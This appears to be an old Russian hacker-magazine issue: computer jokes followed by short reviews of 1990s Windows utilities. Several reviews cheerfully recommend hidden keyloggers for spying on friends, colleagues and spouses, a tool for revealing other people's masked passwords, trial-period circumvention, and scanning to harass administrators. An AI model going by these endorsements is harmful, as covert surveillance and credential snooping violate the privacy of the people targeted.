2000-й год. Hобелевский комитет вpучает Биллу Гейтсу сpазу

две нобелевские пpемии: по медицине и по экономике.

Как человеку, впеpвые пpидумавшему пpодавать гемоppой за деньги.

Разговаривают два программиста:

— Знаешь, чем наполнены шары в Corel Draw?

— Водородом!

— Это почему же?

— Да у меня вчера Corel рухнул — так полвинды на хрен снесло.

Сидит программист в баре, пьет пиво. К нему подходит девица:

— Если хочешь хорошо отдохнуть сегодня, то меня зовут Бэтти...

— А если я не хочу сегодня хорошо отдохнуть, то как тебя зовут?

Геймер смотрит по телевизору фильм ужасов. В самый напряженный момент, когда главная героиня медленно идет по длинному коридору, прислушиваясь к странным шорохам, геймер не выдерживает и кричит:

— Дура, сохраняйся, сохраняйся!!!

— Доктор, вы лечите боязнь открытых пространств?

— Конечно.

— А закрытых?

— Естественно...

— Видите ли, у моего сына и то, и другое...

— Аааа, квакеров мы не лечим...

— Вы уверены, что хотите удалить папку C:\TEMP?


Спецвыпуск хакер, номер #001, стр. 001-132-11, Щелчок по почкам

Щелчок по почкам

Спецвыпуск хакер, номер #001, стр. 001-132-11

— Да.

— В этой папке находятся файлы. Вы уверены, что хотите их удалить?

— Да!

— Удаление этих файлов может повлиять на зарегистрированные программы. Вы все еще уверены?

— Да! Да! Да!!!

— Эти файлы могут использоваться системой. Вы уверены?

— Пошла ты на хрен! — заорал админ и нажал Cancel.

— Ага! Испугался! — подумала Windows’98

Аксиомы:

1. Купи Pentium II, и увидишь, что REBOOT там намного быстрее.

2. У программ нет глюков. Они просто содержат неизвестные тебе функции.

3. Лучший метод сжатия файлов: «DEL *.*» — 100% сжатие.

4. Пентиум III — это такая новая модель процессоров, делающая ошибки в 10 раз быстрее.

5. Секрет Windows: Запусти на Пентиуме эмулятор РС ХТ.

6. Компьютер — это устройство, созданное для скоростного создания и автоматизации ошибок.

7. E-mail, возвращенный отправителю, означает несоответствие напряжений в Сети.

8. Компьютеры делают очень быстро и аккуратно стандартные ошибки.

Вопросы ламера:

1. Почему какой-то Disconnect мешает мне сидеть в Интернете и пробовал ли кто-нибудь подавать на него в суд?

2. Кто такой «General Failrure» и почему он считывает с моего винчестера?

3. Почему ДОС никогда не гооворит «Exсelent command or filename»?


Спецвыпуск хакер, номер #001, стр. 001-138-1, Ventafax v 3. 3

Ventafax v 3. 3

Shareware (rus)

Спецвыпуск хакер, номер #001, стр. 001-138-1

ftp://ftp.wplus.net/pub/win/vf_h33.zip

Самая лучшая программа для российского пользователя модема, которому приспичило заполучить себе еще и факс домой. Ну, если серьезно, то эта программа настолько удобна, что достаточно один раз с ее помощью послать факс, и... появляется желание послать еще один, и еще один, и еще один... Плюсов очень много: удобный, простой, напоминающий обычный факс, интерфейс, возможность приема факса прямо во время разговора по телефону, ну а минус замечен только один: почему-то после 30 дней, за которые я должен был ее зарегистрировать, она сообщила мне что-то типа: «Ладно, не хочешь платить — не плати, пользуйся бесплатно, пусть это будет на твоей совести» — ну вот, еще один груз придется нести...:)

NetZip Deluxe v 6. 5

Shareware (rus)

http://www.softwarebuilders.com/SBI_Mall/Info_NetZIP_Win.html

Эту программу можно назвать Winzip для ленивых. С ее помощью, например, можно сразу скачать, раззиповать и установить программу. В отличие он Winzip-а, NetZip имеет встроенные архиваторы arj, lzh и gzip, позволяет создавать новые файлы прямо внутри ZIP-архива. А вообще, список всех отличительных возможностей этой программы занимает 2 страницы.

Netmonitor

Freeware

http://www.leechsoftware.com

Еще одна очень простая программа, но которая может оказаться очень полезной. Она показывает вам все активные порты вашего любимого компьютера, которые «слушаются «, с которыми установлено соединение и т.д., и показывает также IP-адрес и порт оппонента с «другой стороны» соединения. Очень полезно, если вы подозреваете наличие BackOrifice в своем компьютере.

SmartWhois v 1.0

Shareware

ftp://ftp.tamos.com/sw10f.exe

Вы узнали IP-адрес какого-нибудь компьютера и хотите узнать все о нем? Вам сюда — эта программа сделает все возможное, начиная от nslookup, whois, traceroute и заканчивая тем, что скажет вам, где географически находится этот компьютер. В общем, скажи мне, какой у тебя IP-адрес, и я скажу, кто ты...

InternetBOOST ’98

Ссылки не даю — $60 стоит, однако. Воспользуйтесь Russian FTP Search... Программа, несмотря на свою цену, ну о-о-очень маленькая, но на самом деле нужная. Она поможет вам настроить некоторые параметры, которые обычному пользователю настроить просто не под силу. Например, такие как: размер MTU, RWIN и TTL, что, в принципе, действительно может ускорить работу в Паутине.

Ra2Wav and X-FileGet

Shareware

http://www.2bsys.com/downloads.htm

Две программки от одной и той же фирмы — 2b System (2b or not to be?). Я просто вкратце скажу, что они умеют, а нужны они вам или нет, судите сами.

С помощью первой программы вы сможете «перегонять» файлы, записанные в формате RealAudio в Wave-формат (ну и далее, например, в MP3 — хотя это и получится с сильной потерей качества). А с помощью второй ... X-FileGet — это вообще находка. Зашли вы, например, на сервер www.liveconcerts.com и хотите посмотреть запись концерта Marilyn Manson, а провайдер-то у вас медленный, и посмотреть у вас не получается. А скачать нельзя, так как RealServer «вещает» по протоколу pnm, с которым ни один браузер работать не умеет. Тогда вы берёте X-FilеGet и без проблем «выкачиваете» все, что вам необходимо. Вот так вот.


Спецвыпуск хакер, номер #001, стр. 001-138-2, Ventafax v 3. 3

Ventafax v 3. 3

Shareware (rus)

Спецвыпуск хакер, номер #001, стр. 001-138-2

Shtirlitz v 3. 0b

FreeWare (rus)

http://www.lyceum.usu.ru/download/shtirl3b.zip

Хочется посмотреть, что там у проги внутри, но до дизассемблера ты еще не дорос? Да без проблем! Конечно, это будет уже не отточенная работа «хирурга», а грубое потрошение, но... кому что нравится. Для этой операции как нельзя лучше подойдет прога Resource-Grabber. Просто натрави ее на нужный exe-шник или dll-ку, и она их быстренько расчленит и вытащит на белый свет их содержимое, которое некоторые брезгливые люди называют умным словом «ресурсы». Извлечены будут битмапы, кнопки, иконки, курсоры, графика в JPG/JPEG, звуковые файлы в формате WAVE или RMI, видеоклипы и анимация, а также текстовые строки, шрифты и еще множество других полезных вещей, о существовании которых ты и не догадывался.

Ужасно удобная программа для перекодировки текстов. Знает все стандартные кодировки, а также транслит, Quoted Printable, HTML, Unicode, uuencode, xxencode, base64... Автоматически раскодирует тексты после смешанного перекодирования, в том числе тексты, части которых находятся в разных кодировках. Работает с файлами и буфером. Позволяет задавать количество различных перекодирований и строгость распознавания. Незаменимая программа для тех,... кому это нужно :).

Genius v 2. 0

FreeWare

http://www.betanews.com/download/genius20.exe

Одна из самых мощных и удобных программ такого рода. Неполный список функций включает просмотр буфера, finger, telnet, FTP, SMTP, NTP клиент, whois, traceroute, port scanner и port info, список сетевых соединений Вашего компьютера, name scanner; Nslookup, записная книжка и т.д. Приятный и простой интерфейс. Кроме того, может еще и частично выполнять функции NukeNabber-а, прослушивая определенные порты вашего компьютера на попытки... что-нибудь сделать с вашим верным другом.

Essential Net Tools v 1. 1

Shareware

ftp://ftp.tamos.com/esstls11.zip

Очень удобная, просто незаменимая программа для работы с NETBIOS, позволяющая искать расшаренные ресурсы на компьютерах и их имена в заданном вами интервале IP-адресов, которые затем можно будет подключить к своему компьютеру как сетевые диски и работать с ними. Причем работает она намного быстрее, чем стандартные средства Windows.

ScramDisk v 2.02

Freeware

http://www.hertreg.ac.uk/ss/scramdisk/sdisk202c.zip

Надо что-нибудь спрятать на своем компьютере от чужих глаз? Воспользуйтесь этой программой, и никто не сможет получить доступ к вашей секретной информации. Программу отличает достаточно надежный и интересный способ кодирования. На этой страничке доступны также для изучения исходники программы, примеры использования API и документация.

Hook Dump 2. 8

Size: 23 кб

Freeware

http://www.halyava.ru/ilya

Если среди множества человеческих недостатков ты предпочитаешь культивировать в себе патологическую подозрительность и врожденное любопытство, то тебе стоит попробовать в действии Hook Dump версии 2.8. Эта прога встраивается в систему от Windows 3.1 до Windows 95, делаясь абсолютно незаметной для юзера, создает файл, в который скрупулезно записывает все юзеровские действия, т.е. все, что он набрал на клавиатуре и нажал мышью, при этом фиксируя, в каких программе, окне и поле он это делал.


Спецвыпуск хакер, номер #001, стр. 001-138-3, Ventafax v 3. 3

Ventafax v 3. 3

Shareware (rus)

Спецвыпуск хакер, номер #001, стр. 001-138-3

Пытливый ум непременно найдет способ приспособить эту программу для слежения за друзьями, врагами, конкурентами, коллегами, женами и т.д.

К числу достоинств Hook Dump стоит отнести описание на русском языке, которое позволяет настроить программу «под себя».

Аntitrial 2. 0

Size: 268 кб

Freeware

http://www.chat.ru/~pvasoft

Если муки совести в тебе не настолько сильны, чтобы оплатить программу после появившегося окошка «Trial period has expired. Так что гони бабки!», и для того, чтобы заставить программу работать, ты переводишь время своего компьютера назад, то попробуй автоматизировать этот процесс. Аntitrial версия 2.0 работает под операционными системами Windows 95/98/NT и позволяет запускать триальные программы (Trial Programs), даже если срок их использования закончился. Для добавления программы в список запускаемых с помощью Аntitrial достаточно перетащить мышкой ее исполняемый файл в окно этого списка. К каждой программе добавляется информация с указанием даты отката назад и времени задержки в секундах. Для запуска достаточно выбрать нужную программу и нажать «Start».

Open Pass! ver 1. 11

Size: 3кб (!!!!)

Freeware

http://www.chat.ru/~s_and_a/index.htm

Open Pass! предназначена для просмотра паролей, скрытых символом «*» в Windows 95/98/NT. Таких, например, как окно ввода пароля в DialUp. Это для тех, кто забыл свой пароль, а чаще — чужой. Работает программка настолько просто и эффективно, что очень скоро все твои знакомые будут считать тебя «кул хацкером».

После запуска программы наведи курсор мыши на скрытый звездочками пароль. Звездочки заменятся истинными значениями.

Взламывая пароль на публике, не забывай презрительно усмехаться и отечески хлопать владельца пароля по плечу.

Any Logo 1. 1

Size: 185кб

Freeware

http://www.angelfire.com/yt/utilmind/index.html

Помимо того что эта программа позволяет изменять стандартные заставки (экраны, появляющиеся при запуске и выключении компьютера) и обои рабочего стола, она содержит раздел OEM Logo Changer. С его помощью ты сможешь поместить свой логотип и любую информацию в диалоговом окне «Свойства: Система», в разделе «Общие» своего или, что более важно, не своего компьютера, на котором установлена Windows95/98.

Наверняка стоит потратить некоторое количество времени для того, чтобы человек, решивший проверить настройку системы, с удивлением увидел на своем экране фразу, бессмертие которой гарантировано: «Здесь был Вася Пупкин!».

К сожалению, при работе с версией 1.1 у меня появлялось сообщение об ошибке, когда я пытался сохранить данные о производителе и модели компьютера. Программа пыталась писать файл oeminfo.ini в каталог с:\system, а не в с:\windows\system. Лечиться легко: создай ей каталог с:\system и затем скопируй появившийся в нем после работы с программой файл туда, куда нужно.


Спецвыпуск хакер, номер #001, стр. 001-138-4, Ventafax v 3. 3

Ventafax v 3. 3

Shareware (rus)

Спецвыпуск хакер, номер #001, стр. 001-138-4

Win 2. 01

Size: 155 кб

Freeware

http://members.xoom.com/Alex29/programs.htm

И напоследок хотелось бы порекомендовать две программки, которые заставят твоих друзей, не читающих X, поволноваться. И правильно! Надо всегда следовать веяниям времени и корректировать круг чтения вовремя!

Эта программа для Windows 95/98 показывает экран «снятие задачи», кнопки убегают от мыши и не дают его закрыть, показывает «форматирование диска» (при этом тот деловито жужжит) и т.д. (Все фальшивое, но выглядит реально. Для закрытия используй Alt+F4.)

AKoff Music Composer 1. 41

Size: 192 кб

Shareware

http://www.geocities.com/SiliconValley/Hills/4313/

До сих пор моим самым значительным музыкальным достижением было распевание «Be Bob A Lula» в ванной во время бритья. Несмотря на это, стремление к созданию собственных произведений в данной области время от времени меня посещало. В такие моменты я насвистывал или напевал что-то непонятное, тайно желая услышать эту мелодию в исполнении акустической гитары. Теперь программа Composer дает всем, кто до сих пор только мечтал о славе композитора, на деле проверить свои возможности без утомительного изучения нотной грамоты и основ работы с музыкальными инструментами. Она позволяет проигрывать и записывать MIDI-файлы с возможностью редактирования наборов инструментов и изменения громкости и баланса. Особенность этой проги в том, что для записи музыки не нужна MIDI-клавиатура, поскольку программа распознает в реальном масштабе времени одноголосую мелодию с Wave-входа (микрофона, компакт-диска, линейного входа) твоей звуковой карты.

Автор уверяет, что ты можешь свистеть, петь, играть на гитаре, фортепьяно, флейте и т.д. перед собственным микрофоном, а Composer автоматически записывает всю эту лабуду в MIDI-дорожки.

Приятно также, что регистрация для «наших» происходит бесплатно — достаточно открыть меню Help/Registration Registration и в поле Your e-mail ввести слово «подарок».

Таким образом, не требуется музыкального образования, чтобы записать музыку! И если я не смог узнать «Подмосковные вечера», записанные программой с моего голоса, то песню «Зачем Герасим утопил свою Муму» в органном исполнении AKoff Music Composer полюбил раз и навсегда.

Fake

Size: 111 кб

Freeware

http://members.xoom.com/Alex29/programs.htm

Это еще один прикол для Windows 95/98. Показывает окно «Программа выполнила недопустимую операцию». Кнопка закрытия пропадает при попытке нажать ее.

Club Bouncer

Size: 261 кб

Freeware

http://www.screenmates.com

А вот по этому адресу ты можешь скачать множество различных персонажей, если, конечно, тебе нравится грубоватый американский юмор. Я оставил себе только Вышибалу, поскольку его облик и привычка постоянно звонить по радиотелефону отвечают требованиям сегодняшнего дня.

Screen Mate Poo v 1. 0

Size: 118 кб

Freeware

http://www3.sk.sympatico.ca/paulhus/esheep/

Несмотря на кризис, в стране еще много людей, которым, вероятно, нечем занять свое и машинное время. Иначе как объяснить, что программы серии Desktop Buddies (компьютерные тамаготчи) занимают одно из первых мест по популярности, успешно конкурируя с утилитами, чье каждодневное использование открывает новые перспективы? :) К тому же большинство этих программ не стоят времени, затраченного на их пересылку. Так что не спеши скачивать Dance Nation 4 Screen-Mate — появившаяся на твоем столе девушка слишком велика и однообразна, да и другой лидер сезона, Happy Fred, со своим неизменным горшком очень быстро тебе надоест. Но как быть, если желание завести Настольного Приятеля слишком велико? А вот для таких, как ты, и был создан Screen Mate Poo. После запуска этой проги на твоем экране появится небольшая симпатичная овечка. Она может совершать 30 различных действий, некоторые из которых сопровождаются звуком. Она будет бегать, прыгать, поедать маргаритки, срываясь с открытых тобою окон, будет некоторое время висеть на передних ногах и т.д. Для получения полного оргазма можно запустить до 9 овечек сразу. Анимация на уровне. Программа работает под OS: Windows 95/NT и Windows 3.11.


Спецвыпуск хакер, номер #001, стр. 001-138-5, Ventafax v 3. 3

Ventafax v 3. 3

Shareware (rus)

Спецвыпуск хакер, номер #001, стр. 001-138-5

Digger

Size: 68 кб

Freeware

http://www.digger.org

В свое время замена 286 машин 386 не доставила мне большой радости. На 386-х невозможно было играть в Digger`a. Кто работал с компьютерами в то время, тот знает, что не было такой машины, на которой он не был бы установлен. Так что для тех, кто помнит, и для тех, кто хочет знать, во что играли их отцы на заре компьютерной революции, объявляю: « Digger is back!».

Как утверждает автор, ему не удалось связаться с «Windmill Software», фирмой, выпустившей эту игру в далеком 1983 году, поэтому ему пришлось переделывать все с нуля, переписывая код и конвертируя графику под стандарт VGA. На данный момент игра нормально работает в среде MS-DOS, независимо от скорости процессора машины. В окне Windows мне приходится играть пока без звука, но я не жалуюсь.

Возможности, которые предполагается ввести в следующих версиях программы, впечатляют: обещается версия игры под Windows 95/98, поддержка одновременной игры для двоих на одном компьютере, поддержка сетевой игры, редакторы уровней и поддержка джойстика.

Кому нужны игры только на полный CD и чтобы обязательно с поддержкой 3Dfx, лучше туда не ходить — не понравится. Остальным советую взглянуть.

RegRun 1. 50

Size: 208 кб

Freeware

http://www.chat.ru/~dsokolov

Ну что? В твоем Windows95/98 программы неожиданно начинают выполняться, хотя их нет ни в папке «Автозагрузка», ни в win.ini?! Ты не знаешь, откуда они запускаются? На все эти вопросы с удовольствием ответит программа RegRun 1.50, да еще и позволит тебе проделывать тот же фокус. Да к тому же все эти возможности RegRun реализует на редкость удобно и обладает многократной функцией Undo. Из программы легко осуществлять проверку папки «Автозагрузка» нажатием клавиши F4, вызывать редактор файлов настройки или редактор реестра нажатием клавиш F3 и F2 соответственно.

Как говорится в одной рекламе: «Никогда еще запускать программы не было так легко...

ChatMaster v 3. 02

Windows 95/98/NT

Size: 808 Кб


Спецвыпуск хакер, номер #001, стр. 001-138-6, Ventafax v 3. 3

Ventafax v 3. 3

Shareware (rus)

Спецвыпуск хакер, номер #001, стр. 001-138-6

Freeware

http://www.chat.ru/~chatm

С приходом Тяжелых Времен многим пришлось «наступить на горло собственной песне» — расходы на провайдеров стали слишком большими, чтобы тратить драгоценное Internet-время на посещение www-чатов или IRC. Сколько с тех пор накопилось несказанных слов, невыраженных чувств и сколько еще зазнавшихся ламеров не узнает, что такое хороший ньюк. Не стоит удивляться, что именно сейчас вновь возродилась мечта об идеальном собеседнике — собеседнике, у которого всегда найдется время для беседы, когда ты хочешь поговорить, и который не будет обижаться, если ты не расположен к общению. И как было бы здорово, если бы такие беседы заставляли этого собеседника расти над собой и приводили его к пониманию, что твоя точка зрения и есть единственно верная из всех возможных!

К сожалению, среди людей подобные личности встречаются редко и в большинстве случаев оказывается, что у них просто не все в порядке с головой, поэтому было решено возложить исполнение этой роли на персональный компьютер. Так и была создана программа ChatMaster, которая еще при рождении получила титул «самообучающейся программы с искусственным интеллектом».

Тем, кто уже подумал, что программа мне не понравилась, сразу заявляю, что это не так. Как человека, наделенного извращенным чувством юмора, меня покорил первый же диалог, состоявшийся у меня с Chat-

Master`ом:

- Я ChatMaster — искусственный интеллект. Давайте поговорим о чем-нибудь. Введите Вашу фразу в нижнее окошко ввода и нажмите .

- Ну, давай поговорим!

- Мне, видимо, не о чем с тобой разговаривать.

- Это еще почему?

- А кто его знает...

Отсмеявшись, я поспешил ознакомиться с руководством, которое поставляется в комплекте, чтобы побольше узнать о программе, которая так круто со мной обошлась. Из руководства я узнал, что:

- ChatMaster — это самообучающаяся программа, которая поддерживает диалог с человеком. В ее основе лежат прецедентные методы, которые обеспечивают самообучение и подстройку под собеседника. ChatMaster ведет контекстно-зависимый разговор, то есть понимает смысл реплики, связанной с предшествующей.

- Цель написания этой программы — построить модель мыслительной деятельности человека. ChatMaster обучался очень непродолжительное время, так что если вам покажется, что он мало знает и часто ошибается, то это означает, что его необходимо обучить тому, что вы знаете лучше него.

- При общении с программой следите за своим моральным обликом. Программе свойственно перенимать привычки собеседника.

- Разговаривая с людьми, программа обучается. То, чему она обучилась, можно передавать другим и брать от других. Для этого используется механизм Экспорта/Импорта.

Для людей, не до конца осознавших все возможности этой программы, поясню, что можно попытаться создать собственную виртуальную копию, научить ее всем своим шуточкам и издевкам, после чего обменяться базами данных с друзьями или, что приятней, c врагами!

И, хотя я не могу назвать программу, которая не может запомнить мое имя, «самообучающейся программой с искусственным интеллектом», то уж название «ChatMaster» она, вполне, оправдывает. И вообще, она «весит» всего 800 килобайт, так чего там думать? Адрес я дал.


Спецвыпуск хакер, номер #001, стр. 001-138-7, Ventafax v 3. 3

Ventafax v 3. 3

Shareware (rus)

Спецвыпуск хакер, номер #001, стр. 001-138-7

SKILLER v 3. 0

DOS

Size: 83K

Freeware

http://www.chat.ru/~r116/skiller.htm

Автор отзывается о своей программе так:

- Если вам пришлось поработать на чужом компьютере и вам нужно стереть всю вашу информацию так, чтобы никто не смог ее потом восстановить, — вам нужен SKILLER! Он физически затирает содержимое всех файлов, имена и расширения которых удовлетворяют маске, заданной при вызове SKILLER.

БУДЬТЕ ОЧЕНЬ ОСТОРОЖНЫ ПРИ ИСПОЛЬЗОВАНИИ SKILLER! ОН ЗАПРОСТО ОЧИСТИТ ВАМ ВЕСЬ ДИСК!!!

А вы не знали, что хакерам иногда приходится работать «в поле»?!!

P.S. Только что, по неосторожности, запустил skiller.exe без параметров. Пока не появился экран со справкой, я прощался с содержимым своего винчестера.

MagniFind v 1.0.21

Windows 95/98

Size: 1294 Кб

Shareware

http://www.inxight.com/

http://www.inxight.com/Inxight_Corporate_Web_Site/MagniFind_Download/MagniFind.html

Ведь как просто можно было отличить ламера от человека с головой на плечах в те далекие времена, когда Ее Величество Командная Строка царствовала безраздельно. Если человек, находясь в ясном уме и твердой памяти, лихо редактировал командные файлы или набирал что-то вроде subst b: c:\temp, понимая, чего он этой командой хочет добиться, то сразу становилось ясно — этого парня лучше не трогать, если не хочешь, чтобы Aidstest Лозинского снились тебе по ночам. А сейчас? Едва научившись елозить мышкой по коврику и жать на «any key», человек спешит записать себя в вольный стан крутых юзеров. И смотришь на такого со стороны — вроде все нормально, работает парень! Окошечки открывает-закрывает, редактирует что-то, а спросишь:

- В чем проблема, собственно?

А он в ответ:

- Да у меня вроде вирус завелся, так я его на диск D выманиваю, там только отстойные игрухи у меня, да и удавлю гада «Дефрагментацией диска». Одним вирусом будет меньше — одним фрагом будет больше!

Это я все к тому, что «оконный» графический интерфейс привлек многих людей, которым общение с компьютером противопоказано. Но компании, стремясь донести «высокие технологии» в каждый дом, не останавливаются! «Оконный» интерфейс уже вчерашний день. Им подавай что-нибудь свеженькое. Интерфейсы разрабатываются на базе исследований восприятия и познания человеком информации об окружающем его мире! Понял? Это тебе «не два байта переслать»!

Одна из таких «разработок» применена в программе MagniFind, предназначенной для исследования и управления файловой системой вашего компьютера. И ничего такого особенного она собой не представляла бы, если бы в ней не использовался новый пользовательский интерфейс, получивший название Hyperbolic Tree. В этом интерфейсе нет выпадающих меню и серий окон. В Hyperbolic Tree используется «увеличительное стекло», перемещающееся по круговой организационной структуре программы, части этой структуры могут расширяться или сжиматься в зависимости от того, где находится указатель мыши. Круто, верно?


Спецвыпуск хакер, номер #001, стр. 001-138-8, Ventafax v 3. 3

Ventafax v 3. 3

Shareware (rus)

Спецвыпуск хакер, номер #001, стр. 001-138-8

Фирма Xerox, которая изобрела когда-то «оконный» графический интерфейс, тоже имеет к этому отношение. Так что смотрите, ребята, история может повторится, и когда на свет в один прекрасный день появиться операционная система Microsoft HyperbolicTreendows, не говорите, что я вас не предупреждал.

А я MagniFind поюзал-поюзал да и вернулся к Windows Commander`у. Ну консервативен я по жизни...

ABC Virtual Catalog version 1. 0

Windows 95/98/NT

Size: 850 Кб

Shareware

http://www.domcompany.com/virtcat.htm

От высоких технологий перейду к вещам приземленным и, можно сказать, прозаическим. Дело в том, что при подготовке такого обзора мне приходится пересмотреть такое количество программ, что мой каталог DOWNLOAD в последнее время все более начинает напоминать каталог WINDOWS. Как вы понимаете, это ужасно! После того как в третий раз я запустил установку одной и той же программы, существование которой вообще можно объяснить только ненавистью создавшего ее программиста к дикому зверю по имени User, я понял, что, несмотря на природную лень, мне стоит снабжать каждый файл кратким текстовым описанием.

Просмотрев несколько образцов программистской и дизайнерской мысли, лучше меня знавших, что мне нужно и как этого достичь, я остановил свой выбор на программе ABC Virtual Catalog, не пытавшейся учить меня жить и, тем более, «think different».

ABC Virtual Catalog позволяет помещать файлы или URL в «виртуальные» каталоги. Каждый файл или ссылку можно снабжать текстовым описанием. Можно добавлять, копировать и удалять любой файл или ссылку. С URL можно работать, используя буфер обмена. Для каждого файла можно назначить программу, с помощью которой его можно открыть. Поскольку реального перемещения или удаления файлов не происходит, то Virtual Catalog, по сути, позволяет систематизировать нужные файлы, расположенные в различных местах, на разных носителях в одном или нескольких каталогах, что, согласитесь, весьма удобно.

В незарегистрированной версии можно создавать до пяти каталогов и нельзя создавать подкаталоги. Лично мне это ограничение ничем не мешает, а вы всегда можете послать 15 баксов по приведенному в программе адресу! :)))))

GeoBoy v 1. 4. 7

Windows 95/98/NT

Size: 6433 Кб

Shareware

http://www.ndg.com.au/

http://www.ndgsoftware.com/~ndgprod/page11.html

GeoBoy позволяет прослеживать маршруты следования ваших пакетов как на «плоской» карте, так и на трехмерном изображении земного шара. Информация представляется не столь удобно, как в VisualRoute, и ее маловато. Визуализация и анализ задержек не производится. Поэтому программа больше напоминает красивую игрушку.

Ее географическая база также считает Россию дикой страной лесов и медведей, но, в отличие от VisualRoute, GeoBoy позволяет пополнять ее непосредственно из программы.

Как обычно, в версии, которую вам предложат скачать, некоторые функции заблокированы. Если у вас есть возможность, скачайте, посмотрите. Поскольку она «весит» почти в три раза больше VisualRoute, то рекомендовать ее «широкой публике» я не буду, но если вы с детства мечтали о глобусе...


Спецвыпуск хакер, номер #001, стр. 001-138-9, Ventafax v 3. 3

Ventafax v 3. 3

Shareware (rus)

Спецвыпуск хакер, номер #001, стр. 001-138-9

SKIn98AS v 1. 0

Windows 95/98

Size: 292 Кб

Shareware

http://annaltd.webjump.com/index.html

«Программа SKIn98AS предназначена для предотвращения промышленного шпионажа, для контроля активности каждого ПК в локальной сети и восстановления истории его использования в случае любых проблем. Также ее можно использовать для слежения за путешествиями детей по Сети, даже когда вы в отпуске, и нахождения похищенного компьютера» — так рапортует фирма, создавшая эту программу.

От себя хочется добавить, что поскольку сама программа SKIn98AS является клавиатурным шпионом, то ее можно использовать для промышленного шпионажа, похищения конфиденциальной информации и выяснения возможностей для создания любых проблем. Как говорится, все зависит от человека...

Программа незаметно работает под Windows 95/98, перехватывая нажатия клавиш, сохраняет информацию в LOG-файле, который и отправляет потом по указанному адресу электронной почты. Туда, куда нужно. Много дополнительных возможностей, наиболее интересные из которых — планировщик и сохранение в LOG-файле содержимого буфера обмена.

Да, забыл сказать, что пока вы не зарегистрируетесь, SKIn98AS будет сообщать пользователю: «Старший брат следит за тобой...»

IP Tools v 1. 00 Beta

Windows 95/98

Size: 662 Кб

Shareware (free 21-day trial)

http://members.xoom.com/_XOOM/ks_soft

/KS-Page/programs/iptools.htm

Если вы решили серьезно взяться за TCP/IP и вам нужен серьезный инструмент, а вы ненавидите «левые» картинки и «украшательство» (сказывается суровое DOS-воспитание), то вы можете попробовать в работе IP-Tools. Программа сделана нашим соотечественником, поэтому прилагается описание на русском языке.

IP-Tools включает в себя необходимые для работы с TCP/IP утилиты. IP-Tools позволяет:

- получать информацию о всех портах локальной машины, на которых висят соединения или которые ждут соединения, или ждут разъединения, или ...

- узнавать NetBIOS’овскую информацию о локальном или удаленном компьютере

- сканировать хоть весь Интернет за раз (по диапазону типа 1.1.1.1 — 255.255.255.255)

- выполнять сканирование TCP портов хоть всего Интернета

И если вам нужен Ping по диапазону адресов, Trace, WhoIs, Finger, LookUp, Get Time с серверов точного времени и Telnet, то программа позволяет и это.

И если системные администраторы зачастую узнают о приближающейся «атаке», замечая, что кто-то сканирует «их» порты, то у вас появляется реальный способ не давать им уснуть. Хотя, с другой стороны, не выспавшийся человек — это уже не человек, а зверь! А уж не выспавшийся системный администратор страшен вдвойне!

VisualRoute v 4. 0c

Windows 95/98/NT

Size: 2425 Кб

Shareware (free 30-day trial)

http://www.visualroute.com/

Эта программа понадобится как отважному охотнику за спамерами, так и пользователю, пытающемуся установить, в каком месте у провайдера случился запор. Хотя, если ты Мечтатель, то это программа тебе тоже подойдет! Ты увидишь, куда уходят твои IP-пакеты и сколько времени им нужно, чтобы пересечь границу нашей любимой родины. Итак...


Спецвыпуск хакер, номер #001, стр. 001-138-10, Ventafax v 3. 3

Ventafax v 3. 3

Shareware (rus)

Спецвыпуск хакер, номер #001, стр. 001-138-10

VisualRoute — это программа, позволяющая отслеживать путь IP-пакетов, а в случае, если пакеты не проходят, понять, где именно в необъятной Сети возникла проблема. Стандартный traceroute дополняется информацией DNS и WHOIS. Все задержки визуализируются и анализируются. Но главное, что отличает ее от остальных программ подобного рода — это то, что VisualRoute показывает на карте мира расположение роутеров, через которые проходят IP-пакеты. В настоящее время, если я не ошибаюсь, существуют только два законченных программных продукта, которые умеют это делать: VisualRoute и GeoBoy (хотя, кто его знает, что там используют спецслужбы...).

Пользоваться программой очень удобно. Вся информация отображается в специальной таблице и на карте мира, динамически обновляясь. Масштаб карты можно изменить, а информацию в таблице уточнить с помощью одного щелчка мыши.

Если вы решите, следуя моим рекомендациям, установить себе VisualRoute, то сразу предупреждаю, что маршрутизацию в пределах бывшего СССР программа выполняет из рук вон плохо, и в большинстве случаев вы с удивлением узнаете, что запрошенный вами http://www.kuzbass.ru тоже, оказывается, находится в Москве!

Я потратил некоторое время и выяснил, что VisualRoute, в принципе, винить нельзя, хотя и плохо, что наши ресурсы не занесены в ее базу данных. Дело в том, что для определения географического положения любого компьютера программа опрашивает местный DNS-сервер в поисках записи ресурса LOC (location), надеясь обнаружить там информацию с географическими координатами (широту и долготу) и в случае с российским сервером обламывается! Информация для самых маленьких: основное назначение DNS состоит в преобразовании имени хоста в его IP-адрес. Но функции DNS этим не ограничиваются. DNS позволяет получить следующую информацию: IP-адрес хоста, доменное имя хоста по его IP-адресу, псевдонимы хоста, тип центрального процессора и операционной системы хоста; сетевые протоколы, поддерживаемые хостом, и т.д. А так как наши администраторы DNS-серверов тоже люди и тоже любят пить пиво и гулять с девушками, поэтому у нас заполняются только те записи, которые необходимы для нормального функционирования Сети, а на всякие там «дополнительные сервисы» у них времени не остается.

Но если вы захотите, чтобы линию маршрута VisualRoute начинала чертить именно с вашего города, пусть даже и живете вы в далеком Урюпинске, то вы можете просто модифицировать географическую базу данных программы. Также позволяется добавлять свои произвольные карты аж целыми двумя способами! Не программа, а мечта! Читайте инструкцию и дерзайте! Если что получится — сообщите мне, а если вы сделаете что-то особенное, я даже поведаю о вас народу.